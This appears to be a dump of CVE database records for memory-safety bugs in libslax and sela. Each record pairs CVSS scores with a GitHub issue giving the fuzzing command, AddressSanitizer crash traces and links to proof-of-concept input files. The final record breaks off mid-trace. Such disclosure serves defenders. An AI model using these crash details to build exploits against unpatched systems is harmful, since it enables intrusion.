{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juniper:libslax:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D5523A4-6902-49B4-BD77-FD58DFA71EA1", "versionEndExcluding": null, "versionEndIncluding": "0.22.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Juniper/libslax/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Juniper", "libslax" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), slaxproc (latest master [45d88a](https://github.com/Juniper/libslax/commit/45d88a103c315519cd7e3566eec10dceb4ce9bdc)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./build/slaxproc/slaxproc -o /dev/null -x @@ ## AddressSanitizer output ``` ================================================================= ==36347==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7fff6881f323 at pc 0x0000004e0985 bp 0x7fff6881f2f0 sp 0x7fff6881eaa0 WRITE of size 4 at 0x7fff6881f323 thread T0 #0 0x4e0984 in __asan_memcpy /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 #1 0x5612b4 in slaxLexer /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:955:4 #2 0x55f3a5 in slaxYylex /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1272:10 #3 0x579c59 in slaxParse /home/seviezhou/libslax/build/libslax/slaxparser.c:2447:16 #4 0x56df6e in slaxLoadFile /home/seviezhou/libslax/build/libslax/../../libslax/slaxloader.c:731:10 #5 0x524b1e in do_slax_to_xslt /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:156:9 #6 0x51f1d8 in main /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:1039:5 #7 0x7f7f0fd7883f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41d818 in _start (/home/seviezhou/libslax/build/slaxproc/slaxproc+0x41d818) Address 0x7fff6881f323 is located in stack of thread T0 SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy Shadow bytes around the buggy address: 0x10006d0fbe10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006d0fbe60: ca ca ca ca[03]cb cb cb cb cb cb cb 00 00 00 00 0x10006d0fbe70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006d0fbea0: f1 f1 f1 f1 00 f2 f2 f2 00 00 00 00 00 00 00 00 0x10006d0fbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==36347==ABORTING ``` ## POC [dynamic-stack-overflow-slaxLexer-slaxlexer-955.zip](https://github.com/Juniper/libslax/files/5017114/dynamic-stack-overflow-slaxLexer-slaxlexer-955.zip)
A dynamic-stack-buffer-overflow in slaxlexer.c:955:4
https://api.github.com/repos/Juniper/libslax/issues/53/comments
1
2020-08-03T16:29:31Z
2025-01-02T05:23:03Z
https://github.com/Juniper/libslax/issues/53
672,196,824
53
2,551
CVE-2021-39532
2021-09-20T16:15:12.253
An issue was discovered in libslax through v0.22.1. A NULL pointer dereference exists in the function slaxLexer() located in slaxlexer.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/50" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juniper:libslax:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D5523A4-6902-49B4-BD77-FD58DFA71EA1", "versionEndExcluding": null, "versionEndIncluding": "0.22.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/Juniper/libslax/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Juniper", "libslax" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), slaxproc (latest master [45d88a](https://github.com/Juniper/libslax/commit/45d88a103c315519cd7e3566eec10dceb4ce9bdc)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./build/slaxproc/slaxproc -o /dev/null -x @@ ## AddressSanitizer output ``` ================================================================= ==38438==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002100 at pc 0x000000567501 bp 0x7ffc5b95d2f0 sp 0x7ffc5b95d2e8 READ of size 1 at 0x625000002100 thread T0 #0 0x567500 in slaxLexer /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1107:13 #1 0x55f3a5 in slaxYylex /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1272:10 #2 0x579c59 in slaxParse /home/seviezhou/libslax/build/libslax/slaxparser.c:2447:16 #3 0x56df6e in slaxLoadFile /home/seviezhou/libslax/build/libslax/../../libslax/slaxloader.c:731:10 #4 0x524b1e in do_slax_to_xslt /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:156:9 #5 0x51f1d8 in main /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:1039:5 #6 0x7f8c73f1483f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41d818 in _start (/home/seviezhou/libslax/build/slaxproc/slaxproc+0x41d818) 0x625000002100 is located 0 bytes to the right of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x4e1e90 in realloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107 #1 0x55daf3 in slaxGetInput /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:601:14 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1107:13 in slaxLexer Shadow bytes around the buggy address: 0x0c4a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4a7fff8420:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==38438==ABORTING ``` ## POC [heap-overflow-slaxLexer-slaxlexer-1107.zip](https://github.com/Juniper/libslax/files/5012252/heap-overflow-slaxLexer-slaxlexer-1107.zip)
A Segmentation fault in slaxlexer.c:1107:13
https://api.github.com/repos/Juniper/libslax/issues/50/comments
2
2020-08-02T14:01:43Z
2025-01-02T05:26:14Z
https://github.com/Juniper/libslax/issues/50
671,621,842
50
2,552
CVE-2021-39533
2021-09-20T16:15:12.300
An issue was discovered in libslax through v0.22.1. slaxLexer() in slaxlexer.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juniper:libslax:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D5523A4-6902-49B4-BD77-FD58DFA71EA1", "versionEndExcluding": null, "versionEndIncluding": "0.22.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Juniper/libslax/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Juniper", "libslax" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), slaxproc (latest master [45d88a](https://github.com/Juniper/libslax/commit/45d88a103c315519cd7e3566eec10dceb4ce9bdc)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./build/slaxproc/slaxproc -o /dev/null -x @@ ## AddressSanitizer output ``` ================================================================= ==54185==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002100 at pc 0x0000005661fa bp 0x7fff21d66b10 sp 0x7fff21d66b08 READ of size 1 at 0x625000002100 thread T0 #0 0x5661f9 in slaxLexer /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:986:11 #1 0x55f3a5 in slaxYylex /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1272:10 #2 0x579c59 in slaxParse /home/seviezhou/libslax/build/libslax/slaxparser.c:2447:16 #3 0x56df6e in slaxLoadFile /home/seviezhou/libslax/build/libslax/../../libslax/slaxloader.c:731:10 #4 0x524b1e in do_slax_to_xslt /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:156:9 #5 0x51f1d8 in main /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:1039:5 #6 0x7f8c06e7f83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41d818 in _start (/home/seviezhou/libslax/build/slaxproc/slaxproc+0x41d818) 0x625000002100 is located 0 bytes to the right of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x4e1e90 in realloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107 #1 0x55daf3 in slaxGetInput /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:601:14 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:986:11 in slaxLexer Shadow bytes around the buggy address: 0x0c4a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4a7fff8420:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==54185==ABORTING ``` ## POC [heap-overflow-slaxLexer-slaxlexer-986.zip](https://github.com/Juniper/libslax/files/5012256/heap-overflow-slaxLexer-slaxlexer-986.zip)
A heap-buffer-overflow in slaxlexer.c:986:11
https://api.github.com/repos/Juniper/libslax/issues/51/comments
1
2020-08-02T14:04:56Z
2025-01-02T05:25:35Z
https://github.com/Juniper/libslax/issues/51
671,622,400
51
2,553
CVE-2021-39534
2021-09-20T16:15:12.347
An issue was discovered in libslax through v0.22.1. slaxIsCommentStart() in slaxlexer.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Juniper/libslax/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juniper:libslax:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D5523A4-6902-49B4-BD77-FD58DFA71EA1", "versionEndExcluding": null, "versionEndIncluding": "0.22.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Juniper/libslax/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Juniper", "libslax" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), slaxproc (latest master [45d88a](https://github.com/Juniper/libslax/commit/45d88a103c315519cd7e3566eec10dceb4ce9bdc)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./build/slaxproc/slaxproc -o /dev/null -x @@ ## AddressSanitizer output ``` ================================================================= ==59937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002100 at pc 0x0000005671b1 bp 0x7fff6c8e6110 sp 0x7fff6c8e6108 READ of size 1 at 0x625000002100 thread T0 #0 0x5671b0 in slaxIsCommentStart /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:751:13 #1 0x5671b0 in slaxLexer /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:919 #2 0x55f3a5 in slaxYylex /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:1272:10 #3 0x579c59 in slaxParse /home/seviezhou/libslax/build/libslax/slaxparser.c:2447:16 #4 0x56df6e in slaxLoadFile /home/seviezhou/libslax/build/libslax/../../libslax/slaxloader.c:731:10 #5 0x524b1e in do_slax_to_xslt /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:156:9 #6 0x51f1d8 in main /home/seviezhou/libslax/build/slaxproc/../../slaxproc/slaxproc.c:1039:5 #7 0x7efccb60f83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41d818 in _start (/home/seviezhou/libslax/build/slaxproc/slaxproc+0x41d818) 0x625000002100 is located 0 bytes to the right of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x4e1e90 in realloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107 #1 0x55daf3 in slaxGetInput /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:601:14 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libslax/build/libslax/../../libslax/slaxlexer.c:751:13 in slaxIsCommentStart Shadow bytes around the buggy address: 0x0c4a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4a7fff8420:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==59937==ABORTING ``` ## POC [heap-overflow-slaxIsCommentStart-slaxlexer-751.zip](https://github.com/Juniper/libslax/files/5012260/heap-overflow-slaxIsCommentStart-slaxlexer-751.zip)
A heap-buffer-overflow in slaxlexer.c:751:13
https://api.github.com/repos/Juniper/libslax/issues/52/comments
1
2020-08-02T14:07:30Z
2025-01-02T05:24:31Z
https://github.com/Juniper/libslax/issues/52
671,622,806
52
2,554
CVE-2021-39544
2021-09-20T16:15:12.787
An issue was discovered in sela through 20200412. file::WavFile::writeToFile() in wav_file.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sahaRatul/sela/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` ================================================================= ==42335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625001498100 at pc 0x000000445201 bp 0x7ffc5546e9f0 sp 0x7ffc5546e1a0 READ of size 18 at 0x625001498100 thread T0 #0 0x445200 in __interceptor_memcpy.part.37 /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:779 #1 0x7fe75bdf4387 in std::basic_streambuf<char, std::char_traits<char> >::xsputn(char const*, long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x13d387) #2 0x7fe75bde3262 in std::ostream::write(char const*, long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x12c262) #3 0x557736 in file::WavFile::writeToFile(std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/file/wav_file.cpp:262:32 #4 0x51dc13 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:40:13 #5 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #6 0x7fe75adc383f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41c5e8 in _start (/home/seviezhou/sela/build/sela+0x41c5e8) 0x625001498100 is located 0 bytes to the right of 8192-byte region [0x625001496100,0x625001498100) allocated by thread T0 here: #0 0x518278 in operator new(unsigned long) /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_new_delete.cc:92 #1 0x525759 in __gnu_cxx::new_allocator<int>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27 #2 0x525759 in std::allocator_traits<std::allocator<int> >::allocate(std::allocator<int>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436 #3 0x525759 in std::_Vector_base<int, std::allocator<int> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296 #4 0x525759 in std::_Vector_base<int, std::allocator<int> >::_M_create_storage(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:311 #5 0x525759 in std::_Vector_base<int, std::allocator<int> >::_Vector_base(unsigned long, std::allocator<int> const&) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:260 #6 0x5576d6 in file::WavFile::writeToFile(std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/file/wav_file.cpp:261:51 #7 0x51dc13 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:40:13 #8 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #9 0x7fe75adc383f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow 